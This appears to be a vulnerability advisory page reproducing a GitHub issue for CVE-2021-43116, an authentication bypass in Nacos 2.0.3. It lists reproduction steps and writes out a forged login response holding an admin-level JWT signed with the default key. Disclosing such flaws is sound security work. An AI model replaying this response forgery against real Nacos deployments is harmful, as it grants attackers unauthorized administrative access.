Headline
CVE-2021-43116: Found a login background vulnerability · Issue #7182 · alibaba/nacos
An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.
The steps to reproduce.可复现问题的步骤 1.Download the latest version of NacOS
https://github.com/alibaba/nacos/
2.Follow the steps for installation
3.After the installation is successful, access the default login page
4.Enter any account and password
Click login and the login failed
5.Caught at login time
Intercepting return packet
The intercepted return packet is
6.Replace returns the package and lets it pass
The packet is:
HTTP/1.1 200
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
7.At this point you can see that you have successfully entered the background
The reason for this problem is that NACOS uses the default JWT key
Related news
An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.